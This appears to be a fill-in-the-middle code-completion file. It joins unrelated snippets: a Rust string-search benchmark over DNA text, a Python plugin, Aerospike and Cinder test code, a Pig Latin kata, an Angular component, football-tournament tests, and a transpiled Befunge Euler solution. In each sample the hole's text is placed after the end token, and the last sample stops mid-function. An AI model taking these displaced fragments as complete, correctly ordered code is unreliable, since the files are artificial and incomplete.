CCGGCCTAGCCATGTGATTTCACTTCCACTCCATAACGCTCCTCATACTAGGCCTACTAACCAACACACTAACCATATA\ CCAATGATGGCGCGATGTAACACGAGAAAGCACATACCAAGGCCACCACACACCACCTGTCCAAAAAGGCCTTCGATAC\ GGGATAATCCTATTTATTACCTCAGAAGTTTTTTTCTTCGCAGGATTTTTCTGAGCCTTTTACCACTCCAGCCTAGCCC\ CTACCCCCCAATTAGGAGGGCACTGGCCCCCAACAGGCATCACCCCGCTAAATCCCCTAGAAGTCCCACTCCTAAACAC\ ATCCGTATTACTCGCATCAGGAGTATCAATCACCTGAGCTCACCATAGTCTAATAGAAAACAACCGAAACCAAATAATT\ CAAGCACTGCTTATTACAATTTTACTGGGTCTCTATTTTACCCTCCTACAAGCCTCAGAGTACTTCGAGTCTCCCTTCA\ CCATTTCCGACGGCATCTACGGCTCAACATTTTTTGTAGCCACAGGCTTCCACGGACTTCACGTCATTATTGGCTCAAC\ TTTCCTCACTATCTGCTTCATCCGCCAACTAATATTTCACTTTACATCCAAACATCACTTTGGCTTCGAAGCCGCCGCC\ TGATACTGGCATTTTGTAGATGTGGTTTGACTATTTCTGTATGTCTCCATCTATTGATGAGGGTCTTACTCTTTTAGTA\ TAAATAGTACCGTTAACTTCCAATTAACTAGTTTTGACAACATTCAAAAAAGAGTAATAAACTTCGCCTTAATTTTAAT\ AATCAACACCCTCCTAGCCTTACTACTAATAATTATTACATTTTGACTACCACAACTCAACGGCTACATAGAAAAATCC\ ACCCCTTACGAGTGCGGCTTCGACCCTATATCCCCCGCCCGCGTCCCTTTCTCCATAAAATTCTTCTTAGTAGCTATTA\ CCTTCTTATTATTTGATCTAGAAATTGCCCTCCTTTTACCCCTACCATGAGCCCTACAAACAACTAACCTGCCACTAAT\ AGTTATGTCATCCCTCTTATTAATCATCATCCTAGCCCTAAGTCTGGCCTATGAGTGACTACAAAAAGGATTAGACTGA\ ACCGAATTGGTATATAGTTTAAACAAAACGAATGATTTCGACTCATTAAATTATGATAATCATATTTACCAAATGCCCC\ TCATTTACATAAATATTATACTAGCATTTACCATCTCACTTCTAGGAATACTAGTATATCGCTCACACCTCATATCCTC\ CCTACTATGCCTAGAAGGAATAATACTATCGCTGTTCATTATAGCTACTCTCATAACCCTCAACACCCACTCCCTCTTA\ GCCAATATTGTGCCTATTGCCATACTAGTCTTTGCCGCCTGCGAAGCAGCGGTGGGCCTAGCCCTACTAGTCTCAATCT\ CCAACACATATGGCCTAGACTACGTACATAACCTAAACCTACTCCAATGCTAAAACTAATCGTCCCAACAATTATATTA\ CTACCACTGACATGACTTTCCAAAAAACACATAATTTGAATCAACACAACCACCCACAGCCTAATTATTAGCATCATCC\ CTCTACTATTTTTTAACCAAATCAACAACAACCTATTTAGCTGTTCCCCAACCTTTTCCTCCGACCCCCTAACAACCCC\ CCTCCTAATACTAACTACCTGACTCCTACCCCTCACAATCATGGCAAGCCAACGCCACTTATCCAGTGAACCACTATCA\ CGAAAAAAACTCTACCTCTCTATACTAATCTCCCTACAAATCTCCTTAATTATAACATTCACAGCCACAGAACTAATCA\ TATTTTATATCTTCTTCGAAACCACACTTATCCCCACCTTGGCTATCATCACCCGATGAGGCAACCAGCCAGAACGCCT\ GAACGCAGGCACATACTTCCTATTCTACACCCTAGTAGGCTCCCTTCCCCTACTCATCGCACTAATTTACACTCACAAC\ ACCCTAGGCTCACTAAACATTCTACTACTCACTCTCACTGCCCAAGAACTATCAAACTCCTGAGCCAACAACTTAATAT\ GACTAGCTTACACAATAGCTTTTATAGTAAAGATACCTCTTTACGGACTCCACTTATGACTCCCTAAAGCCCATGTCGA\ AGCCCCCATCGCTGGGTCAATAGTACTTGCCGCAGTACTCTTAAAACTAGGCGGCTATGGTATAATACGCCTCACACTC\ ATTCTCAACCCCCTGACAAAACACATAGCCTACCCCTTCCTTGTACTATCCCTATGAGGCATAATTATAACAAGCTCCA\ TCTGCCTACGACAAACAGACCTAAAATCGCTCATTGCATACTCTTCAATCAGCCACATAGCCCTCGTAGTAACAGCCAT\ TCTCATCCAAACCCCCTGAAGCTTCACCGGCGCAGTCATTCTCATAATCGCCCACGGGCTTACATCCTCATTACTATTC\ TGCCTAGCAAACTCAAACTACGAACGCACTCACAGTCGCATCATAATCCTCTCTCAAGGACTTCAAACTCTACTCCCAC\ TAATAGCTTTTTGATGACTTCTAGCAAGCCTCGCTAACCTCGCCTTACCCCCCACTATTAACCTACTGGGAGAACTCTC\ TGTGCTAGTAACCACGTTCTCCTGATCAAATATCACTCTCCTACTTACAGGACTCAACATACTAGTCACAGCCCTATAC\ TCCCTCTACATATTTACCACAACACAATGGGGCTCACTCACCCACCACATTAACAACATAAAACCCTCATTCACACGAG\ AAAACACCCTCATGTTCATACACCTATCCCCCATTCTCCTCCTATCCCTCAACCCCGACATCATTACCGGGTTTTCCTC\ TTGTAAATATAGTTTAACCAAAACATCAGATTGTGAATCTGACAACAGAGGCTTACGACCCCTTATTTACCGAGAAAGC\ TCACAAGAACTGCTAACTCATGCCCCCATGTCTAACAACATGGCTTTCTCAACTTTTAAAGGATAACAGCTATCCATTG\ GTCTTAGGCCCCAAAAATTTTGGTGCAACTCCAAATAAAAGTAATAACCATGCACACTACTATAACCACCCTAACCCTG\ ACTTCCCTAATTCCCCCCATCCTTACCACCCTCGTTAACCCTAACAAAAAAAACTCATACCCCCATTATGTAAAATCCA\ TTGTCGCATCCACCTTTATTATCAGTCTCTTCCCCACAACAATATTCATGTGCCTAGACCAAGAAGTTATTATCTCGAA\ CTGACACTGAGCCACAACCCAAACAACCCAGCTCTCCCTAAGCTTCAAACTAGACTACTTCTCCATAATATTCATCCCT\ GTAGCATTGTTCGTTACATGGTCCATCATAGAATTCTCACTGTGATATATAAACTCAGACCCAAACATTAATCAGTTCT\ TCAAATATCTACTCATCTTCCTAATTACCATACTAATCTTAGTTACCGCTAACAACCTATTCCAACTGTTCATCGGCTG\ AGAGGGCGTAGGAATTATATCCTTCTTGCTCATCAGTTGATGATACGCCCGAGCAGATGCCAACACAGCAGCCATTCAA\ GCAATCCTATACAACCGTATCGGCGATATCGGTTTCATCCTCGCCTTAGCATGATTTATCCTACACTCCAACTCATGAG\ ACCCACAACAAATAGCCCTTCTAAACGCTAATCCAAGCCTCACCCCACTACTAGGCCTCCTCCTAGCAGCAGCAGGCAA\ ATCAGCCCAATTAGGTCTCCACCCCTGACTCCCCTCAGCCATAGAAGGCCCCACCCCAGTCTCAGCCCTACTCCACTCA\ AGCACTATAGTTGTAGCAGGAATCTTCTTACTCATCCGCTTCCACCCCCTAGCAGAAAATAGCCCACTAATCCAAACTC\ TAACACTATGCTTAGGCGCTATCACCACTCTGTTCGCAGCAGTCTGCGCCCTTACACAAAATGACATCAAAAAAATCGT\ AGCCTTCTCCACTTCAAGTCAACTAGGACTCATAATAGTTACAATCGGCATCAACCAACCACACCTAGCATTCCTGCAC\ ATCTGTACCCACGCCTTCTTCAAAGCCATACTATTTATGTGCTCCGGGTCCATCATCCACAACCTTAACAATGAACAAG\ ATATTCGAAAAATAGGAGGACTACTCAAAACCATACCTCTCACTTCAACCTCCCTCACCATTGGCAGCCTAGCATTAGC\ AGGAATACCTTTCCTCACAGGTTTCTACTCCAAAGACCACATCATCGAAACCGCAAACATATCATACACAAACGCCTGA\ GCCCTATCTATTACTCTCATCGCTACCTCCCTGACAAGCGCCTATAGCACTCGAATAATTCTTCTCACCCTAACAGGTC\ AACCTCGCTTCCCCACCCTTACTAACATTAACGAAAATAACCCCACCCTACTAAACCCCATTAAACGCCTGGCAGCCGG\ AAGCCTATTCGCAGGATTTCTCATTACTAACAACATTTCCCCCGCATCCCCCTTCCAAACAACAATCCCCCTCTACCTA\ AAACTCACAGCCCTCGCTGTCACTTTCCTAGGACTTCTAACAGCCCTAGACCTCAACTACCTAACCAACAAACTTAAAA\ TAAAATCCCCACTATGCACATTTTATTTCTCCAACATACTCGGATTCTACCCTAGCATCACACACCGCACAATCCCCTA\ TCTAGGCCTTCTTACGAGCCAAAACCTGCCCCTACTCCTCCTAGACCTAACCTGACTAGAAAAGCTATTACCTAAAACA\ ATTTCACAGCACCAAATCTCCACCTCCATCATCACCTCAACCCAAAAAGGCATAATTAAACTTTACTTCCTCTCTTTCT\ TCTTCCCACTCATCCTAACCCTACTCCTAATCACATAACCTATTCCCCCGAGCAATCTCAATTACAATATATACACCAA\ CAAACAATGTTCAACCAGTAACTACTACTAATCAACGCCCATAATCATACAAAGCCCCCGCACCAATAGGATCCTCCCG\ AATCAACCCTGACCCCTCTCCTTCATAAATTATTCAGCTTCCTACACTATTAAAGTTTACCACAACCACCACCCCATCA\ TACTCTTTCACCCACAGCACCAATCCTACCTCCATCGCTAACCCCACTAAAACACTCACCAAGACCTCAACCCCTGACC\ CCCATGCCTCAGGATACTCCTCAATAGCCATCGCTGTAGTATATCCAAAGACAACCATCATTCCCCCTAAATAAATTAA\ AAAAACTATTAAACCCATATAACCTCCCCCAAAATTCAGAATAATAACACACCCGACCACACCGCTAACAATCAATACT\ AAACCCCCATAAATAGGAGAAGGCTTAGAAGAAAACCCCACAAACCCCATTACTAAACCCACACTCAACAGAAACAAAG\ CATACATCATTATTCTCGCACGGACTACAACCACGACCAATGATATGAAAAACCATCGTTGTATTTCAACTACAAGAAC\ ACCAATGACCCCAATACGCAAAACTAACCCCCTAATAAAATTAATTAACCACTCATTCATCGACCTCCCCACCCCATCC\ AACATCTCCGCATGATGAAACTTCGGCTCACTCCTTGGCGCCTGCCTGATCCTCCAAATCACCACAGGACTATTCCTAG\ CCATGCACTACTCACCAGACGCCTCAACCGCCTTTTCATCAATCGCCCACATCACTCGAGACGTAAATTATGGCTGAAT\ CATCCGCTACCTTCACGCCAATGGCGCCTCAATATTCTTTATCTGCCTCTTCCTACACATCGGGCGAGGCCTATATTAC\ GGATCATTTCTCTACTCAGAAACCTGAAACATCGGCATTATCCTCCTGCTTGCAACTATAGCAACAGCCTTCATAGGCT\ ATGTCCTCCCGTGAGGCCAAATATCATTCTGAGGGGCCACAGTAATTACAAACTTACTATCCGCCATCCCATACATTGG\ GACAGACCTAGTTCAATGAATCTGAGGAGGCTACTCAGTAGACAGTCCCACCCTCACACGATTCTTTACCTTTCACTTC\ ATCTTGCCCTTCATTATTGCAGCCCTAGCAACACTCCACCTCCTATTCTTGCACGAAACGGGATCAAACAACCCCCTAG\ GAATCACCTCCCATTCCGATAAAATCACCTTCCACCCTTACTACACAATCAAAGACGCCCTCGGCTTACTTCTCTTCCT\ TCTCTCCTTAATGACATTAACACTATTCTCACCAGACCTCCTAGGCGACCCAGACAATTATACCCTAGCCAACCCCTTA\ AACACCCCTCCCCACATCAAGCCCGAATGATATTTCCTATTCGCCTACACAATTCTCCGATCCGTCCCTAACAAACTAG\ GAGGCGTCCTTGCCCTATTACTATCCATCCTCATCCTAGCAATAATCCCCATCCTCCATATATCCAAACAACAAAGCAT\ AATATTTCGCCCACTAAGCCAATCACTTTATTGACTCCTAGCCGCAGACCTCCTCATTCTAACCTGAATCGGAGGACAA\ CCAGTAAGCTACCCTTTTACCATCATTGGACAAGTAGCATCCGTACTATACTTCACAACAATCCTAATCCTAATACCAA\ CTATCTCCCTAATTGAAAACAAAATACTCAAATGGGCCTGTCCTTGTAGTATAAACTAATACACCAGTCTTGTAAACCG\ GAGATGAAAACCTTTTTCCAAGGACAAATCAGAGAAAAAGTCTTTAACTCCACCATTAGCACCCAAAGCTAAGATTCTA\ ATTTAAACTATTCTCTGTTCTTTCATGGGGAAGCAGATTTGGGTACCACCCAAGTATTGACTCACCCATCAACAACCGC\ TATGTATTTCGTACATTACTGCCAGCCACCATGAATATTGTACGGTACCATAAATACTTGACCACCTGTAGTACATAAA\ AACCCAATCCACATCAAAACCCCCTCCCCATGCTTACAAGCAAGTACAGCAATCAACCCTCAACTATCACACATCAACT\ GCAACTCCAAAGCCACCCCTCACCCACTAGGATACCAACAAACCTACCCACCCTTAACAGTACATAGTACATAAAGCCA\ TTTACCGTACATAGCACATTACAGTCAAATCCCTTCTCGTCCCCATGGATGACCCCCCTCAGATAGGGGTCCCTTGACC\ ACCATCCTCCGTGAAATCAATATCCCGCACAAGAGTGCTACTCTCCTCGCTCCGGGCCCATAACACTTGGGGGTAGCTA\ AAGTGAACTGTATCCGACATCTGGTTCCTACTTCAGGGTCATAAAGCCTAAATAGCCCACACGTTCCCCTTAAATAAGA\ CATCACGATG"; static PATTERN: &'static [u8] = b"GCGCGTACACACCGCCCG"; #[bench] fn bench_shift_and(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let shiftand = ShiftAnd::new(PATTERN); shiftand.find_all(TEXT.iter()).collect::<Vec<usize>>(); }); } #[bench] fn bench_bndm(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let bndm = BNDM::new(PATTERN); bndm.find_all(TEXT).collect::<Vec<usize>>(); }); } #[bench] fn bench_bom(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let bom = BOM::new(PATTERN); bom.find_all(TEXT).collect::<Vec<usize>>(); }); } #[bench] fn bench_horspool(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let horspool = Horspool::new(PATTERN); horspool.find_all(TEXT).collect::<Vec<usize>>(); }); } #[bench] fn bench_kmp(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let kmp = KMP::new(PATTERN); kmp.find_all(TEXT.iter()).collect::<Vec<usize>>(); }); }<|fim▁end|>
AAACGAAAGTTTAACTAAGCTATACTAACCCCAGGGTTGGTCAATTTCGTGCCAGCCACCGCGGTCACACGATTAACCC\
<|file_name|>plugin.py<|end_file_name|><|fim▁begin|>import StringIO class Plugin(object): ANGULAR_MODULE = None JS_FILES = [] CSS_FILES = [] @classmethod def PlugIntoApp(cls, app): pass @classmethod def GenerateHTML(cls, root_url="/"): out = StringIO.StringIO() for js_file in cls.JS_FILES: js_file = js_file.lstrip("/") out.write('<script src="%s%s"></script>\n' % (root_url, js_file)) for css_file in cls.CSS_FILES: css_file = css_file.lstrip("/") out.write('<link rel="stylesheet" href="%s%s"></link>\n' % (<|fim▁hole|> if cls.ANGULAR_MODULE: out.write(""" <script>var manuskriptPluginsList = manuskriptPluginsList || [];\n manuskriptPluginsList.push("%s");</script>\n""" % cls.ANGULAR_MODULE) return out.getvalue()<|fim▁end|>
root_url, css_file))
<|file_name|>util.py<|end_file_name|><|fim▁begin|># Copyright 2013-2021 Aerospike, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import re from lib.utils import util def parse_record(parent_field, record): field_names = [] field_values = [] for name in record: if isinstance(record[name], dict): new_parent_field = parent_field.copy() new_parent_field.append(name) names = " ".join(new_parent_field) if "converted" in record[name]: field_names.append(names) field_values.append(record[name]["converted"]) elif "raw" in record[name]: field_names.append(names) field_values.append(record[name]["raw"]) else: # Must have subgroups: sub_names, sub_values = parse_record(new_parent_field, record[name]) field_names.extend(sub_names) field_values.extend(sub_values) else: raise Exception("Unhandled parsing") return field_names, field_values def parse_output(actual_out={}, horizontal=False, header_len=2, merge_header=True): """ commmon parser for all show commands will return tuple of following @param heading : first line of output @param header: Second line of output @param params: list of parameters """ title = actual_out["title"] description = actual_out.get("description", "") data_names = {} data_values = [] num_records = 0 for group in actual_out["groups"]: for record in group["records"]: temp_names, temp_values = parse_record([], record) # We assume every record has the same set of names if len(data_names) == 0: data_names = temp_names data_values.append(temp_values) num_records += 1 return title, description, data_names, data_values, num_records def get_separate_output(in_str=""): _regex = re.compile(r"((?<=^{).*?(?=^}))", re.MULTILINE | re.DOTALL) out = re.findall(_regex, in_str) ls = [] for item in out: item = remove_escape_sequence(item) item = "{" + item + "}" ls.append(json.loads(item)) return ls def capture_separate_and_parse_output(rc, commands): actual_stdout = util.capture_stdout(rc.execute, commands) separated_stdout = get_separate_output(actual_stdout) result = parse_output(separated_stdout[0]) return result def get_merged_header(*lines): h = [[_f for _f in _h.split(" ") if _f] for _h in lines] header = [] if len(h) == 0 or any(len(h[i]) != len(h[i + 1]) for i in range(len(h) - 1)): return header for idx in range(len(h[0])): header_i = h[0][idx] for jdx in range(len(h) - 1): if h[jdx + 1][idx] == ".": break header_i += " " + h[jdx + 1][idx] header.append(header_i) return header def check_for_subset(actual_list, expected_sub_list): if not expected_sub_list: return True if not actual_list: return False for i in expected_sub_list: if isinstance(i, tuple): found = False for s_i in i: if s_i is None: found = True break if s_i in actual_list: found = True break if not found: print(i, actual_list) return False else: if i not in actual_list: print(i) return False return True # Checks that a single expected list has a subset equal to actual_list. def check_for_subset_in_list_of_lists(actual_list, list_of_expected_sub_lists): for expected_list in list_of_expected_sub_lists: if check_for_subset(actual_list, expected_list): return True return False def remove_escape_sequence(line): ansi_escape = re.compile(r"(\x9b|\x1b\[)[0-?]*[ -\/]*[@-~]") return ansi_escape.sub("", line) def check_for_types(actual_lists, expected_types): def is_float(x): try: float(x) if "." in x: return True return False except ValueError: return False<|fim▁hole|> if "." in x: return False return True except ValueError: return False def is_bool(x): if x in ("True", "true", "False", "false"): return True return False def check_list_against_types(a_list): if a_list is None or expected_types is None: return False if len(a_list) == len(expected_types): for idx in range(len(a_list)): typ = expected_types[idx] val = a_list[idx] if typ == int: if not is_int(val): return False elif typ == float: if not is_float(val): return False elif typ == bool: if not is_bool(val): return False elif typ == str: if any([is_bool(val), is_int(val), is_float(val)]): return False else: raise Exception("Type is not yet handles in test_util.py", typ) return True return False for actual_list in actual_lists: if not check_list_against_types(actual_list): return False return True<|fim▁end|>
def is_int(x): try: int(x)
<|file_name|>Simple Pig Latin.py<|end_file_name|><|fim▁begin|>def pig_it(text): return ' '.join([x[1:]+x[0]+'ay' if x.isalpha() else x for x in text.split()]) # 其实就是2个字符串过滤拼接,比移动方便多了,思路巧妙 <|fim▁hole|> x[1:]+x[0]+'ay' else x return ' '.join([ ])<|fim▁end|>
# a if xx else b, 单行判断处理异常字符,xx为判断,标准套路 for x in text.split() if x.isalpha()
<|file_name|>code.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit, OnDestroy } from '@angular/core'; import { Http } from '@angular/http'; import { Router, ActivatedRoute } from '@angular/router'; import { Observable, Subject, Subscription } from 'rxjs'; import { CodeLayer } from '../core/model/code-layer.model'; import { CodeService } from '../core/services/code.service'; import { NavigationService } from '../core/services/navigation.service'; <|fim▁hole|>}) export class CodeComponent implements OnInit, OnDestroy { public showCode: boolean; public focusOn: string; public focusDiv: boolean; public codeSections: any[]; public codeSubscription: Subscription; public urlSubscription: Subscription; public location: string; constructor(private http: Http, private router: Router, private codeService: CodeService, private navigationService: NavigationService) { let a: any = this.router.url.split('/'); if(a.length === 4) { this.focusOn = '_'+a[3].split('-').join('')+'_'; this.focusDiv = true; } this.urlSubscription = this.navigationService.locationSubscription$.subscribe(x=> { let a: any = this.router.url.split('/'); if(a.length === 4) { this.focusOn = '_'+a[3].split('-').join('')+'_'; this.focusDiv = true; } }); this.codeSections = this.codeService.getCodeLayers(); if(!this.codeSections.length) { this.codeSubscription = this.codeService.codeSubscription$.subscribe(x=> { this.codeSections = this.codeService.getCodeLayers(); this.showCode = true; }); } else { this.showCode = true; } } focusElement(e: Event) { console.log(e); this.focusOn = e.srcElement.getAttribute('data-layer'); this.focusDiv = true; } ngOnInit() { } ngOnDestroy() { if(this.urlSubscription) this.urlSubscription.unsubscribe(); if(this.codeSubscription) this.codeSubscription.unsubscribe(); } removeFocus() { this.focusOn = null; this.focusDiv = false; } }<|fim▁end|>
@Component({ selector: 'app-code', templateUrl: './code.component.html'
<|file_name|>test_models.py<|end_file_name|><|fim▁begin|>from models.team import Team from models.tournament import Tournament from models.tree import ProbableTournamentTree import unittest import pdb class TestTeam(unittest.TestCase): def setUp(self): self.tournament = Tournament() self.teams = self.tournament.teams self.usa = Team.get_for_country(self.teams, 'United States') self.brazil = Team.get_for_country(self.teams, 'Brazil') def test_add_friendly_result(self): self.usa.add_friendly_result(opponent=self.brazil) self.usa.add_friendly_result(opponent=self.brazil, result=Team.DRAW) self.usa.add_friendly_result(opponent=self.brazil, result=Team.LOSS) self.assertIn(self.brazil, self.usa.friendly_results['wins']) self.assertIn(self.brazil, self.usa.friendly_results['draws']) self.assertIn(self.brazil, self.usa.friendly_results['losses']) # try adding a friendly result for a team not in the tourney prev_draws = len(self.usa.friendly_results['draws']) self.usa.add_friendly_result(opponent=Team.get_for_country(self.teams, "Israel"), result=Team.DRAW) self.assertEqual(prev_draws + 1, len(self.usa.friendly_results['draws'])) def test_base_score(self): # these tests operate using some basic, commonly held assumptions (which could actually be a source of human error) self.assertGreater(self.brazil.base_score, self.usa.base_score) self.assertGreater(self.usa.base_score, Team.get_for_country(self.teams, "Ghana").base_score) def test_get_for_country(self): self.assertEqual(Team.get_for_country(self.teams, 'Brazil').country, 'Brazil') def test_get_for_group(self): self.assertIn(Team.get_for_country(self.teams, 'Brazil'), Team.get_for_group(self.teams, 'A')) self.assertNotIn(Team.get_for_country(self.teams, 'Brazil'), Team.get_for_group(self.teams, 'B')) class TestTournament(unittest.TestCase): def setUp(self): self.tournament = Tournament() self.teams = self.tournament.teams def test_get_group_winners(self): winners = self.tournament.get_group_winners('A') self.assertEqual(winners[0].country, 'Brazil') self.assertEqual(winners[1].country, 'Mexico') class TestTree(unittest.TestCase): def setUp(self): self.tournament = Tournament() self.teams = self.tournament.teams self.tree = ProbableTournamentTree(self.tournament) def test_get_opponent_at_stage(self): brazil = Team.get_for_country(self.teams, 'Brazil') mexico = Team.get_for_country(self.teams, 'Mexico') cameroon = Team.get_for_country(self.teams, 'Cameroon') spain = Team.get_for_country(self.teams, 'Spain') netherlands = Team.get_for_country(self.teams, 'Netherlands') opp = self.tree.get_opponent_at_stage(brazil, 0) self.assertEqual(opp.country, netherlands.country) opp = self.tree.get_opponent_at_stage(brazil, 1) self.assertEqual(opp.country, Team.get_for_country(self.teams, 'Colombia').country) opp = self.tree.get_opponent_at_stage(brazil, 3) self.assertEqual(opp.country, spain.country) opp = self.tree.get_opponent_at_stage(netherlands, 0) self.assertEqual(opp.country, brazil.country)<|fim▁hole|> self.assertEqual(opp.country, spain.country) # test for a team that isn't in the probability tree self.assertEqual(self.tree.get_opponent_at_stage(cameroon, 0).country, self.tree.get_opponent_at_stage(mexico, 0).country) if __name__ == '__main__': unittest.main()<|fim▁end|>
opp = self.tree.get_opponent_at_stage(mexico, 0)
<|file_name|>test_volume_types_extra_specs.py<|end_file_name|><|fim▁begin|># Copyright (c) 2011 Zadara Storage Inc. # Copyright (c) 2011 OpenStack Foundation # Copyright 2011 University of Southern California # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Unit Tests for volume types extra specs code """ from cinder import context from cinder import db from cinder import test class VolumeTypeExtraSpecsTestCase(test.TestCase): def setUp(self): super(VolumeTypeExtraSpecsTestCase, self).setUp() self.context = context.get_admin_context() self.vol_type1 = dict(name="TEST: Regular volume test") self.vol_type1_specs = dict(vol_extra1="value1", vol_extra2="value2", vol_extra3=3) self.vol_type1['extra_specs'] = self.vol_type1_specs ref = db.volume_type_create(self.context, self.vol_type1) self.addCleanup(db.volume_type_destroy, context.get_admin_context(), self.vol_type1['id']) self.volume_type1_id = ref.id for k, v in self.vol_type1_specs.iteritems(): self.vol_type1_specs[k] = str(v) self.vol_type2_noextra = dict(name="TEST: Volume type without extra") ref = db.volume_type_create(self.context, self.vol_type2_noextra) self.addCleanup(db.volume_type_destroy, context.get_admin_context(), self.vol_type2_noextra['id']) self.vol_type2_id = ref.id def test_volume_type_specs_get(self): expected_specs = self.vol_type1_specs.copy() actual_specs = db.volume_type_extra_specs_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(expected_specs, actual_specs) def test_volume_type_extra_specs_delete(self): expected_specs = self.vol_type1_specs.copy() del expected_specs['vol_extra2'] db.volume_type_extra_specs_delete(context.get_admin_context(), self.volume_type1_id, 'vol_extra2') actual_specs = db.volume_type_extra_specs_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(expected_specs, actual_specs) def test_volume_type_extra_specs_update(self):<|fim▁hole|> expected_specs['vol_extra3'] = "4" db.volume_type_extra_specs_update_or_create( context.get_admin_context(), self.volume_type1_id, dict(vol_extra3=4)) actual_specs = db.volume_type_extra_specs_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(expected_specs, actual_specs) def test_volume_type_extra_specs_create(self): expected_specs = self.vol_type1_specs.copy() expected_specs['vol_extra4'] = 'value4' expected_specs['vol_extra5'] = 'value5' db.volume_type_extra_specs_update_or_create( context.get_admin_context(), self.volume_type1_id, dict(vol_extra4="value4", vol_extra5="value5")) actual_specs = db.volume_type_extra_specs_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(expected_specs, actual_specs) def test_volume_type_get_with_extra_specs(self): volume_type = db.volume_type_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs) volume_type = db.volume_type_get( context.get_admin_context(), self.vol_type2_id) self.assertEqual(volume_type['extra_specs'], {}) def test_volume_type_get_by_name_with_extra_specs(self): volume_type = db.volume_type_get_by_name( context.get_admin_context(), self.vol_type1['name']) self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs) volume_type = db.volume_type_get_by_name( context.get_admin_context(), self.vol_type2_noextra['name']) self.assertEqual(volume_type['extra_specs'], {}) def test_volume_type_get_all(self): expected_specs = self.vol_type1_specs.copy() types = db.volume_type_get_all(context.get_admin_context()) self.assertEqual( types[self.vol_type1['name']]['extra_specs'], expected_specs) self.assertEqual( types[self.vol_type2_noextra['name']]['extra_specs'], {})<|fim▁end|>
expected_specs = self.vol_type1_specs.copy()
<|file_name|>Euler_Problem-075.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2 # transpiled with BefunCompile v1.3.0 (c) 2017 import sys import zlib, base64 _g = ("Ah+LCAAAAAAABACT7+ZgAAEWhre3/LNvG0iwP1i/yPTlUbXVqdvzlJoi+a3Lj8v6RJl1JZacmaK7/Otuf07ZXEnrN/zZZ+cdV4iexrfrz59Tftsevr0tcO7wz0oLK678" + "PLvaHVX/Lff8K6otFRbb/W/369X9D7+oMAiXlZWJlbEzGIQaM4yCUTAKRsEoGPzgnzcjw4w9ejJ35HS6A8KTT0zfPp3dVXBWrHr2qoXeofNfZVm8eZ31+0g2a93585ut" + "w3JN9984E/ele8axTZZS1/4XxB6I/8bdWrVmWqrMqqVnDpeUFEb23t0kFaTV171P99WmM7e/nr75LancfFrm1OPBq7oXnf9bc4u/fb3/3oIH/XuqLEPeHm7aK7k69NbU" + "j1ON+IS38DrntEX0b9Q9bSi3fJNHZfS+7LDknKDAKz+17ksmzxX7nszEf/ni27IX/L83eufKdO3eW73qcUGUSaGGf9fjO+ecNvY8rjv2ff2Hw4HBfJrnv1rKzVuvl26p" + "vrMvWfi4740pH/MS7p499OejfabZ97vdb3Nqb4b/3CLxyEjzg4Hnz617Yp9s/1T2f3VU6Pf2nZ5/lcKOCtzecu+YOz+jZzvnrad7/hg+31n1vtguPv/Tkp0Vh4u/824s" + "fMX7Q1acAQDKcaipZwcAAA==") g = base64.b64decode(_g)[1:] for i in range(ord(base64.b64decode(_g)[0])): g = zlib.decompress(g, 16+zlib.MAX_WBITS) g=list(map(ord, g)) def gr(x,y): if(x>=0 and y>=0 and x<1000 and y<1515): return g[y*1000 + x]; return 0; def gw(x,y,v): if(x>=0 and y>=0 and x<1000 and y<1515): g[y*1000 + x]=v; def td(a,b): return ((0)if(b==0)else(a//b)) def tm(a,b): return ((0)if(b==0)else(a%b)) s=[] def sp(): global s if (len(s) == 0): return 0 return s.pop() def sa(v): global s s.append(v) def sr(): global s if (len(s) == 0): return 0 return s[-1] def _0(): gw(2,0,1000) gw(3,0,1500000) sa(gr(3,0)-1) sa(gr(3,0)) gw(tm(gr(3,0),gr(2,0)),(td(gr(3,0),gr(2,0)))+3,0) return 1 def _1(): return (2)if(sp()!=0)else(3) def _2(): sa(sr()); sa(0) v0=sp() v1=sp()<|fim▁hole|> v1=sp() sa(v0) sa(v1) sa(td(sp(),gr(2,0))) sa(sp()+3) v0=sp() v1=sp() gw(v1,v0,sp()) sa(sr()-1) v0=sp() v1=sp() sa(v0) sa(v1) return 1 def _3(): gw(6,0,0) gw(8,0,1) sp(); return 4 def _4(): return (21)if(((gr(8,0)*gr(8,0)*4)+(gr(8,0)*6)+2)>gr(3,0))else(5) def _5(): sa((gr(8,0)+1)*(gr(8,0)+1)*2) sa(gr(8,0)+1) gw(9,0,gr(8,0)+1) return 6 def _6(): global t0 sa(sp()*gr(8,0)*2) sa(sp()+sp()); t0=sp() t0=(1)if(t0>gr(3,0))else(0) return (20)if((t0)!=0)else(7) def _7(): global t0 global t1 global t2 t0=(gr(9,0)*gr(9,0))-(gr(8,0)*gr(8,0)) gw(2,1,(gr(9,0)*gr(9,0))-(gr(8,0)*gr(8,0))) t1=gr(8,0)*gr(9,0)*2 gw(3,1,gr(8,0)*gr(9,0)*2) t1=t1+(gr(9,0)*gr(9,0))+(gr(8,0)*gr(8,0)) gw(4,1,(gr(9,0)*gr(9,0))+(gr(8,0)*gr(8,0))) t2=t0+t1 gw(6,1,t2) return 